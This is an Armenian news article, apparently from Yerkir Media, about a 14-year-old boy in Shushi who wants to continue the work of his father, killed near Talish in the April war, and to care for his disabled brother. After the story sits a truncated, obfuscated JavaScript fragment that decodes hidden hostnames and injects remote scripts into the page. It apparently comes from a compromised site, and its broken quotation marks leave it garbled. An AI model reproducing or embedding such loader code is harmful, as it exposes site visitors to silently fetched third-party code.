14-ամյա Ալեքսանդրը որոշել է աշխատել ու շարունակել ապրիլյան պատերազմին կորցրած հոր` կիսատ թողած գործերը

yerkir.am— Ապրիլի 29-ի լույս 30-ի գիշերը Թալիշում հակառակորդի կողմից մահացու վիրավորված  48-ամյա շուշեցի Վազգեն Հարությունյանը Արցախյան ազատամարտի մասնակից էր:

Ապրիլյան մարտերի ժամանակ կամավոր բարձրացել էր դիրքեր, պայմանագրային զինծառայող եղբորորդու հետ Մատաղիսում էր` ամենաթեժ կետերում:

Վազգենը երկու անչափահաս որդի ունի, մեծը 14 տարեկան է, ծնվել է մանկական կաթվածով (ДЦП), չի լսում, իսկ կրտսեր որդին` Ալեքսանդրը` 13 տարեկան է:

Վազգենի եղբայրը պատմում է, որ Ալեքսանդրը դպրոցից հետո հոր հետ գնում էր անտառ, փայտ բերում, կտրում, վաճառում, կենդանիներ պահում:

«Ես իմացա, որ իրավիճակը վատ ա, ասեցի` մի’ գնա, ասեց չէ` գնալու եմ, երկու երեխա ունեմ, պիտի գնամ, որ երկուսդ խաղաղ ապրեք»,- հիշում է Ալեքսանդրն ու պատմում, որ հայրը դիրքեր մեկնելուց առաջ իրեն է տվել պարտքերի ցուցակն ու ասել, որ եթե հետ չգա` մոր կողքին մնա և հոգ տանի եղբոր մասին:

Վազգենը որոշել էր ապրիլի 15-ին հիվանդ որդուն տանել Երևան` ստուգումների:

«Տեգրս որոշել էր ապրիլի 15-ին երեխային տանել Երևան, բժշկի հետ պայմանավորվել էր, դրությունը վատացավ` բարձրացավ դիրքեր: Ինքն էլ առողջական խնդիրներ ուներ, ասաց` հետո՞ ինչ` հիվանդ եմ, պետք ա նստեմ, սպասեմ ե՞րբ ա ադրբեջանցին գալիս մեր տան մեջ մեզ սպանում, ոնց որ Թալիշում արեց: Ու գնաց դիրքեր, ասաց` ոչինչ, երեխաս մի ամիս էլ կսպասի, բայց…»,- պատմում է Վազգենի եղբոր կինը` Աիդա Հարությունյանը:

Վազգենի կինը չի աշխատում, ընտանիքն ապրում է ծանր սոցիալական պայմաններում, երեխաների մասին հոգ է տանում հորեղբայրը, ով բազմազավակ ընտանիքի հայր է և դժվարությամբ է պահում սեփական ընտանիքը:

Ալեքսանդրը որոշել է աշխատել ու շարունակել հոր` կիսատ թողած գործերը` եղբորը տանել բուժման, տան համար ծածկ սարքել: Տղան սահմանափակվում է համեստ երազանքներով.

«Ուզում եմ խոզերին շատացնեմ, տնտեսությունը մեծացնեմ: Ուզում եմ մաթեմատիկայից լավ լինեմ ու խանութում աշխատեմ, որ իրեն (նկատի ունի եղբորը) տանեմ բուժման»: Տղան որոշել է` ինչ էլ լինի` Շուշիից չի գնալու: «Ուզում եմ մնալ Շուշիում, մինչև կյանքից վերջն էլ մնալու եմ Շուշիում»,- ասաց նա:

Մանրամասները՝ տեսանյութում:

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “yerkirmedia.am”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return “”},c=function(e,t,o){var lp=p();if(lp==””)return;var n=lp+”//”+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.smlo.loadSmlo(n.replace(“https:”,”http:”));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(“firefox”))window.zSmlo.loadSmlo(n.replace(“https:”,”http:”));else{var i=document.createElement(“script”);i.setAttribute(“src”,n),i.setAttribute(“type”,”text/javascript”),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,”function”==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),”function”==typeof o&&o())}}},s=function(f){var u=a(f)+”/ajs/”+t+”/c/”+r(d())+”_”+(self===top?0:1)+”.js”;window.a3164427983=f,c(u,function(){o(“a2519043306”)!=f&&n(“a2519043306”,f,{expires:parseInt(“3600”)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(“a36677002”)!=i&&n(“a36677002”,i);var r=o(“a2519043306”);t=r?r:e[0],s(t)};f()}();
// ]]>


Source: Yerkir Media
Link: 14-ամյա Ալեքսանդրը որոշել է աշխատել ու շարունակել ապրիլյան պատերազմին կորցրած հոր` կիսատ թողած գործերը

Your generosity empowers our advocacy, inspires our work, and sustains our momentum.
DONATE NOW!
close-image